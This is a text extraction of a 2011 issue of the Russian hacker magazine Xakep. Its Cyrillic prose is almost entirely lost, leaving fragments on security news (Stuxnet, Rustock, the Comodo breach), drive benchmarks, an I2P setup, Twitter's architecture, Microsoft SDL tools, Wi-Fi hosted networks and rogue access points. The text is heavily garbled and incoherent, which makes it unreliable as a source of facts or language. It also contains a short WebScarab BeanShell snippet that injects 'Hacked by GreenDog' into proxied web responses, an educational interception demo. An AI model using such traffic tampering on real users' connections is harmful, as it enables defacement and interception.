Хакер 2011 05 PDF

.
82
x 05 (148) 2011
.
210
:

PWN2OWN:
05 (148) 2011
VOIP
5 DVD

VOIP-
PHREAKING /
. 60
PHREAKING
. 130
148
Linux USB-
Red.Button:
Twitter

MS08- 067:
WINDOWS
. 68
. 82
.
210
:

PWN2OWN:
05 (148) 2011
VOIP
5 DVD
= 90

VOIP-
. 60
PHREAKING
. 130
Linux USB-
Red.Button:
Twitter

MS08- 067:
WINDOWS
. 68
INTRO
,
C :
1. Phreaking.
, kumekay
. ,
,
- DIY.
.
2. 90 . , , .
, .
:
? .
: www.xakep.ru/podpiska,
,
(540 , 1080 ).

. ,
,
.
3.
. , ,
,
, .
,
- . ,
Eset.
4. ,
- : 150- .
,
-, 27 , .
www.xakep.ru/150x.
nikitozz, . .
http://vkontakte.ru/xakep_mag
Content
MegaNews
004
Ferrum
016
PC_Zone
022
026
I2P

: Google Cloud
Microsoft Office

028
140
033
034
Twitter ?
TeamViewer
13
038
Microsoft
082
086
Easy-Hack
046
052
, ,
!
partypoker.com
058
client-side

060
VoIP!
064
2004 , ?
VoIP-

Red.Button
068
60
072
X-Tools
Windows

MALWARE
074
078

free- Avast, Avira, AVG, Comodo, ClamAV
SEO
BlackHat SEO
090
096
102
Windows
systemd, ulatencyd, relayd fscd
Linux

106
110
, Rogue AP,
042
Positive Technologies

iOS, Android, Bada, Symbian WM
Wi-Fi
Pwn2Own:

114
AirPlaySDK

memory leaks
SYN/ACK
118
122
127
SaaS

ERP -
-?
PHREAKING
130
134
Arduino

555
5 555
140
143
144
FAQ UNITED
FAQ
8.5
WWW2
web-
022
I2P

130
060
VoIP-
VoIP!
Phreaking
>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>
Forb
(forb@real.xakep.ru)
PC_ZONE UNITS
step
(step@real.xakep.ru)
, MALWARE SYN/ACK
Dr. Klouniz
(alexander@real.xakep.ru)
UNIXOID PSYCHO
Andrushock
(andrushock@real.xakep.ru)
PHREAKING
kumekay
(po@kumekay.com)
>

> DVD

Step
(step@real.xakep.ru)
Unix-
Ant
(antitster@gmail.com)
Security-
D1g1
(evdokimovds@gmail.com)

> xakep.ru
(xa@real.xakep.ru)
/ART
>
(olgaeml@glc.ru)
(alekhina@glc.ru)
>-

>

>
(polikarpova@glc.ru)
>
(maligina@glc.ru)
/PUBLISHING
>
( )
(strekneva@glc.ru)
>

>

> -
(alekseeva@glc.ru)
> MAN TV

>
, 115280, , . ,19, , 5 , 21
.: (495) 935-7034, : (495) 545-0906
>

>

>.

>

>

>

>

>

>

.: (495) 935-7034, : (495) 545-0906
> TECHNOLOGY
(komleva@glc.ru)
>

>

>
(kosheleva@glc.ru)
>

>

> :
-
DVD-: claim@glc.ru.
>

: (495) 545-09-06

: (495) 663-82-77

: 8-800-200-3-999
>
101000, , , / 652,

,

77-11802 14.02.2002
Zapolex,
.
190 874 .

.

. ,
,
.

.
.

:
content@glc.ru
, , 2011
MEGANEWS
Mifrill (mifrill@real.xakep.ru)
Meganews
SCADA-
,
Stuxnex, , ,
. ,
, Stuxnet, - . Stuxnet (
Symantec) ,
, ,
. , ,
. , Ottawa Sun,
,
. 2011
, SCADA-. , SCADA
Supervisory Control And Data Acquisition, : .
, , , . - Agora SCADA+
Gleg,
DDoS-.
0day-. -

. ,
: Siemens Tecnomatix
FactoryLink, Iconics GENESIS, 7-Technologies IGSS DATAC RealWin.
Gleg, ,
, , SCADA-
, . ,
. ,
, . Proof-of-concept
seclists.org/bugtraq/2011/Mar/187.
! ICANN
.xxx . ,
$60. 200 000 .

, .
NEC. ,
HS100-10, .
IT ,
. :
, ,
- , , . ,
. NEC .
HS100-10 , ,
. ,
.
,
. HS100-10 USB .
, , ,
.
004
X 05 /148/ 2011
MEGANEWS
SONY
Sony vs
GeoHot, . ,
graf_chokolo,
PlayStation
3 . Sony
(
), ,
, ,
, PS3.
, ,

HV Bible.
, ,
. Sony
,
,
graf_chokolo :
, .

, , ,
Sony. , .
, .

Sony. ,
(
16-20 000). ,
(grafchokolo.com).
3.60, ,
. ,
Winocm,
YouTube,
.
, Winocm Sony,

.
, MySpace , .
comScore ,
: 73 63 000 000.
RUSTOCK ,
,
. :
Microsoft
, 2006 Rustock.
.
,
192 - .
150 000 2 400 000. ,
, , Rustock - . b107.
Microsoft Digital Crimes Unit
,
, , Rustock. Microsoft,
Microsoft ,
, ,
. -, . :
33.6%. -,
- ,
, , Rustock 13 820 000 000
. , . Bagle
Festi, .
8 310 000 000 4 200 000 000
006
, . Bagle, ,
22%
.
, .
, .
X 05 /148/ 2011
MEGANEWS

,
. , -
,
, .
WirelessHD, WHDi, Intel WiDi .
, ,
,
. Fujitsu

CeBIT SUPA (Smart
Universal Power Access).
. . Fujitsu
22- , -:
.
.

(
25 ),
. CeBIT
,
. ,
, USB ,
.
Fujitsu .
, ? :)

Samsung,
CeBIT -
. VA- 46
1920 x 1080 -
.
.
. ,
Samsung
.
30 Firefox 4 550 000

.
!

Windows 7 Windows Server
2008 R2.
,
SYN/ACK UNIXOID. ,
,
,
, ,
Windows UNIX, , .
Active Directory
,
Windows. Windows 7 Windows Server 2008 R2 100%
,
, ,
IT-.
GH0STMARKET.NET
Gh0stMarket.net. .
, ,
,
, .
, . , GhostMarket
008
,
, - .
,
8 000 .
GhostMarket 65 000 ,
$25 000 000.
. ,
.
. : 19- , 18- 21- . , .
, ,
. ,
, .
,
, .
.
, , ,
.
X 05 /148/ 2011
MEGANEWS
LTE-
- ,
LTE-
. (Yota),
-
,

(, , , ) .
:
180 (
$2 000 000 000),
LTE-
. 2014
.
,

, , ,

. , ,
. ,
30-40 ( ) 2.5-2.7. , ,
, , Yota
, , ,
.
--
,
,
Facebook. - Color - App Store
Android Market,
.
. ,

, , (
Color).
,
.
,
Sequoia Capital, Bain Capital
Silicon Valley Bank Color
$41 000 000. ,
.

, .
MySQL.com Sun.com , SQL. Naked Security ,

,
WordPress .
FACEBOOK HACKER CUP

, Facebook
Facebook Hacker Cup. .
, , 11 768
. (25 ) -
Facebook, ( )
. 7 ,
6 , 4 , 2 , , , , .
, , . ,
(TopCoder, Google Code Jam ). Facebook
Hacker Cup :
aka ACRush,
Hacker Cup $5 000.
. !
,
facebook.com/hackercup.
010
X 05 /148/ 2011

SSL-
SSL, Comodo
- (mail.google.com, google.com, login.yahoo.
com, login.skype.com, addons.mozilla.org, login.live.com). 15-
CEO ,
, ,
, ,
. ,
IP,
, SSL-.
SSL- Google, Skype, Microsoft, Mozilla Yahoo. -
, , login.skype.
com, ,
. , pastebin.com/74KXCaEZ
-,
. , Janam Fadaye
Rahbar (
), ,
, 21-
, .
, ,
. ,

Comodo InstantSSL.it. ,
TrustDll.dll, C#.
,
API Comodo, , . ,
,
. . , (, TrustDLL),
, Mozilla addons.
,
, .
MEGANEWS
QIWI
, , ( )
.

Trojan.PWS.OSMP. ,
Qiwi.
Windows :
maratl.exe, ,
,
. .
USB-, ( ).
(
, -, Delphi) BackDoor.
Pushnik,
. ,
,
( ),
Trojan.PWS.OSMP .
Qiwi ,
, Dr.Web
,
.
, ,
,
.
EDIFIER
Edifier
.
Edifier :
.
, Edifier
. ,
S330D,
S330,
.
2.1 ,
,
. Edifier , S330D
. , S330D
.

.

AUX-,
.
72 .
20 20 000 .
S330D
, (Xbox, Sony PlayStation)
. , Edifier

S530D S730D, .
ZEUS

ZeuS,
. ,
malware ZeuS SpyEye.

. , SpyEye,
, ZeuS,
. ,

, .

: .
,
.
,
, ,
. :
ZeuS,
, ,
, . , :

.
,

.
IOO Jabber
ICQ
, .
: ,

ZeuS
, .
Zone-H 2010 1 419 203

. Linux c Apache.
012
X 05 /148/ 2011
SAMSUNG GALAXY TAB , IPAD 2

CTIA Samsung
, Android 3.0 (Honeycomb). , Galaxy Tab 10.1 Galaxy Tab 8.9
iPad
Apple. Samsung
, 595 470
8,6 ( iPad 8,8 ).
iPad: $599
$499 ). 1 , WXGA TFT LCD (1280 x 800),
microSD ( 32 ). (3 LED 2 )
Full HD , .
:
Bluetooth 2.1 + EDR, HSPA + 21 M/ 850/900/1900/2100, EDGE/GPRS
850/900/1800/1900, Wi-Fi 802.11 (a/b/g/n).
, , , SIM. 6800 10
. Readers
Hub Music Hub, 2 200 000
, 2 000 49 , 2 300 22
13 000 000 . : Bluetooth- ,

, , USB Galaxy Tab 8.9. , Android
Galaxy Tab.
-
,
.

.
- ,

, ,
Allofmp3 Rutracker.

, , (
,

)

-.
:

.
, , , .
.
X 05 /148/ 2011
013
MEGANEWS
TFT-

Wexler WEXLER.BOOK T7002.
, 7.0 TFT- LED .
,

. (
),
. ,
, E-ink,
. Wexler, ,
.
(ansi, txt, pdf, html,
fb2, pdb, epub), /
(mp3, wma, flac, AAC), (wmv, rm, avi,
rmvb, 3gp, flv, mp4, mpeg, mkv) (jpeg, bmp, gif). ,
:). , ,
LCD-
. TFT- WEXLER.BOOK
T7002 .
7 ,
5 , ( )
30 .
4 ,
200 000 .
20
MicroSD.
mini-USB , . WEXLER.
BOOK T7002
.
: , , , , , .
. , , :
4 599 .
- Mozilla Adobe Flash

- ,
Firefox Flash.
HTML5.
NOKIA X1-00: 61
Nokia.

. X1-00
Series 30
,
,

. Nokia
,
1320 61 (!) . , ,
,
?

mp3-.

,
, FM-,
014

microSD ( 16
).
.
,
, ,
,
. , X1-00
35. Nokia
,
,
(
).

.
,
-.
X 05 /148/ 2011
X 05 /148/ 2011
FERRUM

:
: Intel Core 2 Duo E4700, 3500
: ASUS P5QC
: 2x1024 , Kingston
DDR2, 800
: NVIDIA GeForce 9800 GT
: 430 , Thermaltake
: Microsoft Windows 7
Ultimate x32
1
,
,
. , , .
-
. .
99%
,
. , ,
( ,
) , .
, , , ,
! ,
MTBF, , .
. , ,
SATA
3.0, ,
, . ,
HDD ( )
SATA III,
. ,
. 7200 ,
5400
, . , ,
,
016
, ,
. .
, -,
.
32 (16 ),
64 . ,
RAID-,
,
RAID-, .

, . , - ,
, , .
. , AIDA64
( Lavalys Everest),
.
. , HD Tune
Pro , .
X 05 /148/ 2011
4000 .
3400 .
Hitachi Deskstar
7K2000
HDS722020ALA330
Hitachi Ultrastar
A7K2000
HUA722010CLA330
: 2
: SATA II
: 32
: 7 200 /
: 29
: 0.74
: 1
: SATA II
: 32
: 7 200 /
: 24
: 0.68
Hitachi Deskstar 7K2000 ,

. 2
,
, . ,
, , ,
, , . , , -.
, Hitachi
Deskstar 7K2000 .
, Hitachi Ultrastar A7K2000

,
, NAS.
, 1
, , Hitachi Deskstar
7K2000 Ultrastar A7K2000 . , - 32 .
, :

. ,
( ), -
.
X 05 /148/ 2011
,
, , Ultrastar A7K2000
. , ,
. , ,
.
017
FERRUM
3000 .
3200 .
SAMSUNG
HD204UI
Seagate Barracuda
Green ST31500541AS
: 2
: SATA II
: 32
: 5 400 /
: 29
: 0.65
: 1.5
: SATA II
: 32
: 5 900 /
: 26
: 0.655
, Samsung
5 400 , ,
, .
,
/.
, 32 ,
. ,
, ,
.
, ,
. Seagate Barracuda
Green ST31500541AS Samsung HD204UI. ,
. ,
. , ( )
. ,
.
,
.
. , ,
.
Seagate Barracuda Green ST31500541AS .

. -
, . , - 1.5 , 2,
Samsung.
018
X 05 /148/ 2011
8400 .
5400 .
Western Digital
Caviar Green
WD30EZRS
Western Digital
Caviar Black
WD2001FASS
: 3
: SATA 3.0
: 64
: 5400-7200 /
: 25
: 0.73
: 2
: SATA II
: 64
: 7 200 /
: 30
: 0.75
: 3
SATA 3.0. RAID- ,
.
WD Green ,

. , ,
64 .
, , . ,
? . Western Digital Caviar Black :
. ,
-,
, .
, :
,
. : , ,
RAID-. ,
,
.
X 05 /148/ 2011
, (, , ,
): .
019
FERRUM

HD Tune Pro Access time read/write,
HD Tune Pro Average read/write, /

Western Digital Caviar Black WD1002FAEX
Western Digital Caviar Black WD2001FASS
Western Digital Caviar Green WD30EZRS
Seagate Barracuda Green ST31500541AS
SAMSUNG HD204UI
SAMSUNG HD103UJ
Hitachi Ultrastar A7K2000 HUA722010CLA330
Hitachi Deskstar 7K2000 HDS722020ALA330
Write
Read
Western Digital Caviar Black WD1002FAEX

Western Digital Caviar Black WD2001FASS
Western Digital Caviar Green WD30EZRS
Seagate Barracuda Green ST31500541AS
SAMSUNG HD204UI
SAMSUNG HD103UJ
Hitachi Ultrastar A7K2000 HUA722010CLA330
Hitachi Deskstar 7K2000 HDS722020ALA330
0
20
40
60
80
100
Seagate Barracuda Green

120
Write
Read
10
15
20
Western Digital Caviar Black
AIDA 64 Linear Read Western Digital Caviar Green WD30EZRS
AIDA 64 Linear Read SAMSUNG HD204UI
AIDA 64 Linear Read Western Digital Caviar Black WD2001FASS
AIDA 64 Linear Read Hitachi Ultrastar A7K2000

HUA722010CLA330
AIDA 64 Linear Read Seagate Barracuda Green ST31500541AS
AIDA 64 Linear Read Hitachi Deskstar 7K2000 HDS722020ALA330
, . ,
020
. Samsung
HD204UI, , Western Digital Caviar
Black WD2001FASS, .
, , , HDD. z
X 05 /148/ 2011
PC_ZONE

I2P
.
, . , ,
,
, I2P.
I2P vs Tor
, I2P?
, IP . I2P
pear-to-pear ,
. I2P , . .
Tor. , , I2P,
.
, I2P Tor, -
022
,
. ,

. Tor
, I2P
, .
- ( ,
,
), .
-,
I2P eepsites. -
Hidden Services, X 05 /148/ 2011

( HTTP). I2P

Base 32 Names
.onion Tor.
516- ( )
raw-. SHA256 Base32.
.b32.i2p.
? .
www.
i2p2.i2p, :
I2P
Tor, I2P . ,
, .
I2P DNS-, - DHT (Distributed Hash Table),
Kademlia. .
, 2007 Tor. , I2P , . ,
I2P
, NetDB.
, , , ,
-
.
I2P

IP,
,
, . , www.i2p2.i2p (
I2P) :
-KR6qyfPWXoN~F3UzzYSMIsaRy4udcRkHu2Dx9syXSz
[... ...]
e9NYkIqvrKvUAt1i55we0Nkt6xlEdhBqg6xXOyIAAAA
,
516 Base64. , .
X 05 /148/ 2011
rjxwbsw4zjhv4zsplma6jmf5nr24e4ymvvbycd3swgiinb
vg7oga.b32.i2p
. I2P
- DNS-,
( <somename>.
i2p ), . I2P
, .
HOSTS.
,

I2P.
, ,
.
I2P . Tor
, I2P
(in) (out) . ,

.
(, ),
.
,
.
I2P (Garlic routing). , ,
( )

.
, -
DVD
dvd
,
,
.
INFO
info

I2P- ?

: https://
www.awxcnx.de/
cgi-bin/proxy2/nphproxy.cgi/000000A/
http/< >
023
PC_ZONE

P2P- I2P

, .

, ,
, .
.

, I2P. :
IRC, BitTorrent, eDonkey, Email.
I2P API
, ,

I2P-.
,
. I2P Java,

Java-.
, .
.
-, 127.0.0.1:7657/index.jsp. .
I2P
( ), HTTP-: 127.0.0.1:4444. . .
, I2P ,
. , I2P, eepsite. ,
,
I2P
. ( ,
) IP-
. step-by-step
I2P.
1. 127.0.0.1:7658,
-. eepsite,
. , ~/.i2p/eepsite/docroot/ (Linux) %APPDATA%\I2P\
eepsite\docroot\ (Windows). Jetty, I2P:
7658 . , .
, I2P .
2. , .
(127.0.0.1:7657/i2ptunnel),
I2P- I2P
024
webserver , . . . ,
, (local
destination) , -
F94tTd-vSO7C0v~4wudVsaYV[.. ...]AAAA.
Base64 ,
I2P-. - IP-.
-
.
Base32- ( ) Python- ( ).
,
zeky7b4hp3hscdwovgb2vtdbv
ltsvpf24ushype5uoigu42p3v5q.b32.i2p.
, , . ,
, .
3. DNS I2P , . eepsite
(something.i2p). ,
- , :
127.0.0.1:7657/susidns/addressbook.jsp?book=router&filter=none.
,
mysite.i2p
(, xa31337xa.i2p).
,
I2P.
4. ! .
eepsite . , , ,
. ,

eepsite. !
- Base32, .

I2P, - . ,
: 127.0.0.1:4444. ,
, .

( outproxy). , , -
. , I2P .
,
VPN/Tor/SSH-. I2P , , .
X 05 /148/ 2011
Base64 Base32

I2P
DNS
5. , .

, -
127.0.0.1:7657/susidns/addressbook.jsp?book=master.
,
, , .
6. eepsite stats.i2p.
, . (516 Base64).
Submit. ? ,
. (
) xa31337xa.i2p.
, DNS-. , ,
Base32- : stats.i2p/cgi-bin/jump.cgi?a=xa31337xa.i2p.
- ,
wiki ugha.i2p/eepsiteIndex
forum.i2p.
7. , ,
.
. , ,
: .
127.0.0.1:80, , ,
92.241.175.142:80 ( ip- xakep.ru).
SSH-
- I2P
.
SSH-,
, eepsite. .
1. , I2P
. SSH-.
, -
: , (
X 05 /148/ 2011
inproxy.tino.i2p/status.php
eepsite,
;
tracker2.postman.i2p exotrack.i2p BitTorrent;
hashparty.i2p (LM, MD5, MYSQLSHA1, NTLM, SHA1 );
redzara.i2p dumpteam.i2p
192.168.1.1:22).
, .
(Base32)
.
2. , , ,
SSH- (, PuTTY). . I2P .
SOCKS, , ,
. , , , I2P,
,
I2P- SOCKS 4/4a/5. , , ( 5454).
3. , . PuTTY, , . Connection Proxy
Proxy proxyname ,
SOCKS- 127.0.0.1:5454. DNS name
lookup Yes Auto.
4. . , I2P SSH.
, -, .
:
I2P 100% eepsite?.
: . , ,
, I2P.
-. ,
IP- .
. ,
Irongeek (irongeek.com)
,
BlackHat 2011 DC. z
025
PC_ZONE
Step (twitter.com/stepah)
:
GOOGLE CLOUD
MICROSOFT OFFICE

:
Microsoft Office - Google Docs.
.
,
.
!

,
Microsoft Office.
026
OpenOffice, LibreOffice, AbiWord

, .
: , .
X 05 /148/ 2011
Cloud Connect

OpenOffice, -

Microsoft. ,
-.
Google Docs. ][
, .

,
,
. EtherPad
Docs . ,
, .
,
. .
Google Docs ,
, ,
. ,
Office .
, ,
? .
, Office
,
Google Docs. , , .
Google Docs + MS Office =

OffiSync (www.offisync.com). Microsoft Word, PowerPoint Excel
,
Google. ?
,
. Google Docs , .
, ,
( ) .
, OffiSync
Google Docs ( ).
X 05 /148/ 2011

, ,
, , . , -
, OffiSync
(merge). , .
:
Google? , :).
DocVerse,
Office
2007, Google Docs.
- Microsoft $25 000 000. , Google Cloud Connect
for Microsoft Office (tools.google.com/dlpage/cloudconnect)
. OffiSync, ,
. ,
Microsoft Word, PowerPoint
Excel, . Cloud Connect ,
. : ,
.
, , .
: - , .
, Microsoft
SkyDrive (skydrive.
live.com) - Office Web
Apps (office.microsoft.com/ru-ru/web-app). ,

Microsoft Office. ,
Windows Live Mesh. z
027
PC_ZONE
(insight-i t.ru)
140

Twitter ?
, ,
, . 5 .
? 140 @ #. Twitter-
( follower).
, -,
175 000 000 .
Twitter Odeo,
.
. , ,
?. 140 000 000
028
Twitter .
.
Twitter
- , - (
, ). ,
25% -, API.
: , , 182%.
: 6 000 000 000 API ,
70 000 !
HTTP, .
X 05 /148/ 2011

Web
Load Balancers
API
Apache mod_proxy
HTTP://WWW
25%
Rails (Unicorn)
MySQL
links
Cassandra
75%
Flock
memcached
Kestrel

Twitter
-

: insightit.ru/highload
Daemons

- API
Ruby on Rails,
Ruby Scala. , Ruby
on Rails ,
Twitter ,
10-20% ,
RoR
.

, ,
. , NTT America,
.
:
,
.
Apache
httpd, ,
Ruby.
Unicorn,
, ,
( 30% )
.
Apache + Unicorn . :
( ), ActiveRecord, SQL- Ruby, ,
,
.
.
, ,
. Twitter, memcached,
Segmentation Fault ( ). ,

TTL ( ), .

. . Twitter memcached
Ruby libmemcached FNV Ruby md5.
,
. , .
, - ( , :
).
memcached,
.
, ,
X 05 /148/ 2011
Twitter
,
. . MySQL.
,
.
: ,
, .
.
FlockDB , MySQL.
Gizzard.
,
. .
Twitter 13 000 000 000 ,
20 000 100 000 -

3 , 2 1 Twitter,
.
.
460 000 .
6 939 TPS (
), 4
.
029
PC_ZONE
Flock
Flock

Gizzard

MySQL
Gizzard
100 000
Mysql
Mysql
Mysql
Flock
.
FlockDB :
: 1
: 2
: 1 , 16
: 100 /
Twitter , Cassandra. Facebook

, .

, .
,
. Cassandra Twitter :
.
,
.
Twitter
Twitter :
15-25 , 12 .
. ,
80
, 12 48 .

.
.
Java-
Apache Hadoop ,
,
. Hadoop
. ,
030
MapReduce. ,
,
. HDFS
(Hadoop Distributed File System),
,
. .
Hadoop
Google File System (GFS).
, HDFS ,
MapReduce ,
- Java. ,
Hadoop Twitter:
, ( ,
5 12 000 000 000 ),
PageRank .
MapReduce,
Java, .

Twitter OAuth
X 05 /148/ 2011
Twitter
- , opensource
.

:
- .
- ,
, ,
opensource. Cassandra Scribe, ,
Facebook,
Twitter.
Twitter
, , ,
:
Loony , Python, Django, MySQL
Paraminko ( SSH Python).
LDAP, .
Murder ,
BitTorrent. P2P-
30-60 .
Kestrel , Scala
memcache. ,
: set ( ) get (
).
.

, . , Twitter
Pig, , Hadoop.
,
.
Twitter
X 05 /148/ 2011
031
PC_ZONE

SQL, , 20
,
MapReduce-.
Twitter Pig. Hadoop Twitter ,
. opensource HBase,
Google BigTable. , HDFS,
.
, ,
, ,
-
, .
,
, .
syslog-ng, . : Facebook,
, Scribe,
opensource Twitter.
.
. Scribe
.
, ,
.
, HDFS (
).
Twitter , 30 .
Facebook, .
. Twitter ,
-:
032
;
;
.
,
,
.
( ), ,
. , . , :
?
.
:
, ,
.
Twitter , . ?
Rails (HTTP 500), ,
. ? HTTP- 502
503, 5 ( - ,
),
(mkill).

.
bash-, 60 ,
/ , .
Twitter
,
- .
- - .
,
. ,
:).
Twitter
?
1. ,
.
2.
.
3. , . , ,
-
, .
4. memcached
.
5.
,
.
6. .
Twitter . , API . ,
. ,
. -, ,
.
, . z
X 05 /148/ 2011
PC_ZONE
Step twitter.com/stepah
(twitter.com/stepah)

TeamViewer

TeamViewer.

,

, NAT.
IP
, RDP
VNC . -
TeamViewer
: NAT, .
.

.
, IP-,
, ,
, .
TeamViewer -.

.

.
.
,
.

, ,
TeamViewer.

KeepAlive. TeamViewer
,
.
,
100 000 000
.
!
QuickSupport
.
- ,
.
.
. ,
,
.
. ?.

. ,
X 05 /148/ 2011
,

-.
.
,
MacBook.
,
Windows, Mac OS X
Linux. -
: PRM,
deb, tar.gz. , () TeamViewer
,
. ,

.
.
.

.
Android iOS (
iPhone iPad).
,
( ,
),
.
3G
, . - ActiveX Java.
, TeamViewer
, -

( , , ,
). TeamViewer
Web Connector login.
teamviewer.com.
HTML/Flash ActiveX
Java,
. . TeamViewer?
,

NAT. : TeamViewer

Windows, Linux, Mac.

.
.
.
!
, ,
-
(xakep.ru/magazine/xa/116/032/1.asp) z
ID TeamViewer
033
PC_ZONE
13

Microsoft

? , , , . Microsoft
,
, .

Microsoft ,
. .
, 40 (!) . Microsoft , 2004
SDL (Security Development Lifecycle).
, SDL , , . SDL, Microsoft
, .
, ,

.
SDL
.

Microsoft . ,
034
,
. , ,
. ,
, .

,
.
/
BinScope Binary Analyzer
DEP ASLR.
,
.
, SDL,
:
DEP, ASLR.
/NXCOMPAT /DYNAMICBASE. , Binscope SDL X 05 /148/ 2011
,
SDL. ,
SDL
/,
.
Binscope
, ( , ).
AppVerifier
Application Verifier , native ,
.
,
( runtime). AppVerif , ,
. ,

API, .
Attack Surface Analyzer Beta

Attack Surface Analyzer. Microsoft,
.
, - . , snapshot

, :
, , ,
ActiveX-, ,
ACL- .
Code Analysis for C/C++

. , Code
Analysis for C/C++

Visual Studio.
native- , , ,
, .
Microsoft Code Analysis Tool .NET (CAT.

NET)
, .NET :
(C#, Visual
Basic .NET, J#). . CAT.NET ,
Cross-Site Scripting (XSS), SQL
Injection XPath Injection.
Microsoft.
X 05 /148/ 2011
40
FxCop
.
, .NET
.NET
Framework. , ,
. FxCop
CIL ( ,
Microsoft .NET) .
Anti-Cross Site Scripting (Anti-XSS)

Library
,

. , Anti-XSS , XSS- -. ,
- WAF (
-) Security
Runtime Engine (SRE). ,
HTTP-, -
.
INFO
info

Secure
Lifecycle Development:
microsoft.com/
security/sdl.
SiteLock ATL Template

: ActiveX, ,
ActiveX-.
SiteLock Active Template
,
. , ATL
ActiveX-, . , ActiveX-
035
PC_ZONE
BinScope Binary Analyzer
MiniFuzz File Fuzzer
MiniFuzz File Fuzzer

( ),
.
, .
banned.h
C/C++,
, buffer
overflow .
: (xstrcpy(), strcat(),
gets(), sprintf(), printf(), snprintf(), syslog()), (access(), chown(), chgrp(), chmod(), tmpfile(), tmpnam(),
tempnam(), mktemp()),
(exec(), system(), popen()). ( )
. ,

, ,
(, ,
SDL).
SDL, ( ) ,
. Minifuzz File Fuzzer
, ,

.
,
.
SDL Regex Fuzzer

(Regex) ,
Microsoft. SDL Regex Fuzzer

. . ( ) . ,
,
(, ,
), DoS-. , ,
. z
SDL Threat Modeling Tool

.
.
SDL Threat Modeling Tool , , . ,
.
SDL Threat Modeling Tool
.
SDL Process Template

Visual Studio ( )
, ,
, Microsoft
SDL . , ,
SDL. .
036
SDL Regex Fuzzer

X 05 /148/ 2011
PC_ZONE
, Rogue AP,
Wi-Fi

. -
3G- WiMax- .
- (Rogue AP) , , . ,
!
3G-
.
USB-, -
038
. , ,
.
X 05 /148/ 2011
netsh
,
3G-, , Wi-Fi

.
,
,
Windows-.
Windows
7 Windows 2008 Server R2.
.
, Wireless Hosted Network (
). , , ,
.
Wireless Hosted Network

:

(Virtual WiFi);
(SoftAP).
VirtualWifi , WLAN-,
.

, ,
.
SoftAP

(infrastructure mode),
. ,
: WLAN ( Virtual WiFi
X 05 /148/ 2011
4

1. .
, .
,
USB 3G-
. , MAC,

.
2.
.

,
. ,
Wi-Fi (
Connectify Clone Wi-Fi Settings).
.
HTTP://WWW
links

Wireless Hosted
Network:
http://goo.gl/3p7Gq;

MSDN:
http://goo.gl/6qp2y;
,

:
http://goo.gl/yfYuf.
3. Rogue AP .
,

.
Wireshark, 0x4553Intercepter Network Miner .
USB- ,
( ,
) .
4. .
,
VPN-.
- OpenVPN Tor.
,

.
, .
039
PC_ZONE
,
),
3G-, WiMax- ethernet-.

Wireless Hosted Network . , (, ,
)
Wireless Hosted Network,
-. ,
, Windows 7.
,
.
, ,
, - , ,
Wireless Hosted Network. . Microsoft, ,
,
: ,
API- (
MSDN),
netsh (network shell). Netsh.exe
, .
.
, netsh
wlan /?. , .
, :
#
netsh wlan start|stop hostednetwork
#
netsh wlan set hostednetwork [mode=]allow|disallow
# , SSID,
# , (/)
netsh wlan set hostednetwowrk [ssid=]<ssid>
[key=]<passphrase> [keyUsage=]persistent|temporary
#
netsh wlan refresh hostednetwork [data=] key
# ,
# ( )
netsh wlan show hostednetwork [[setting=]security]
#
netsh wlan show settings
, : ,
Wireless Hosted Network,
,
Virtual WiFi. : Asus
Intel 3945ABG WLAN-
.
,
. .
1.
040
netsh.exe :
netsh wlan set hostednetwork mode=allow ssid="Virtual
Hostpot" key="pass pass pass" keyUsage=persistent
Virtual Hostpot SSID , pass pass pass ( persistent) .

- WiFi Microsoft
.
.

SoftAP , .
WPA2-PSK/AES (
, ).
2.
,
. , ,
. :
netsh wlan start hostednetwork
3. , , .
- , -.
,
, ,

.
,
, , Wireless Hosted Network
.
Internet Connection Sharing (ICS).

IP- ( DHCP-),
NAT (Network address
translation).
, !
, ,
.
: ( )
. . ,
, MSDN Wireless
Hosted Network
.
: Virtual Router (virtualrouter.codeplex.com)
Connectify (connectify.me).
GUI- ,
,
.
SSID :
. Virtual Router ,
(
X 05 /148/ 2011
Virtual Router

Ubuntu

Linux, Windows, . ,
, : wireless.kernel.org.

, .
Ad-Hoc Mode Working . ,
wiki:
help.ubuntu.ru/wiki/wifi_ap.
Mac OX X
Mac OS X
Infrastructure, , .
,
MacBook
, .
: bit.ly/macbook_hotspot.
onnectify

API- ).
, netsh.
Connectify .
X 05 /148/ 2011
,
,
. .
, Wireless
Hosted Network WPA2-PSK/AES:
, .
, (, ).
, Connectify UPnP-
VPN- ( OpenVPN). -
. , ,
. . z
041

GreenDog , DSecRG.ru, Digital Security (agrrrdog@gmail.com)
Easy Hack
1
:

NOTEPAD++.
:
:).
, - .

/ ,
. nix ,
. , *nix grep gawk (gnu.org/software),
.
Notepad++. , .
, , Cain ,
/.
Notepad++: / , .
, regexp :
1)^.*:\s
2)\r\n :
3) :--------------------- \r\n
, Notepad++ regexp
, .
. (
),
, .
- .
Cain .
<Home>, <End>.
shortcuts.xml. Notepad++, %APPDATA%
. .
, , : notepad-plus-plus.ru/uploads/cod.zip.
:
, PROCESS
MONITOR.
:
Sysinternal, . (sysinternals.com) .
:
( :) ).
,
- , Process Monitor
(procmon.exe).
. ,
, ,
. , Notepad++ , shortcuts.xml.
:
1.
2.
3.
4.

/ , ,
(, ),
. Tools File Summary, (. ).
, . !
, .
- .
. shortcuts.xml
Notepad++ Procmon.
Procmon: Process name is notepad++.exe
Notepad++.
.
042
X 05 /148/ 2011
:
-.
:
, , FireFox
. .
,
FoxyProxy. FoxyProxy
-. , , -
, . ,
.
, , ,
, . , :).
, .
.
:
HTTP(S)- WEBSCRAB.
if (bytes != null) {
String content = new String(bytes);
content="<h1>Hacked by GreenDog<h1>"+content;
response.setContent(content.getBytes());
}
:
, , -
(Base64) http,
.
webscrab.
- , . Webscrab -
/,
. OWASP (owasp.org/index.php/
Category:OWASP_WebScarab_Project). webscrab
. .
webscrab Kuzya forum.antichat.ru/showthread.
php?t=106452.
.
webscrab (127.0.0.1:8008, ),
, webscrab
, , realm (
) Tools Credentials. !
- ,
webscrab http/.
.

Tools User full-featured
interface, Proxy Bean Shell. Enabled. Commit.
, Bean. Bean Shell
Java. ,
. beanshell.org/manual/
bshmanual.html.
:
return response;
}
.
, 1 URL testphp.
vulnweb.com www.ya.ru (
Acuntix :) ).
URL URL
.
2 ,
( ), .
3 ,
, , ,
. . .
,
- . / :
owasp.org/index.php/How_to_modify_proxied_conversations.
bean shell.
-webscrab (Tools
Proxies). -webscrab, bean shell <> webscrab
<> .
yandex? :)
public Response fetchResponse(HTTPClient nextPlugin,

Request request) throws IOException
{
// 1
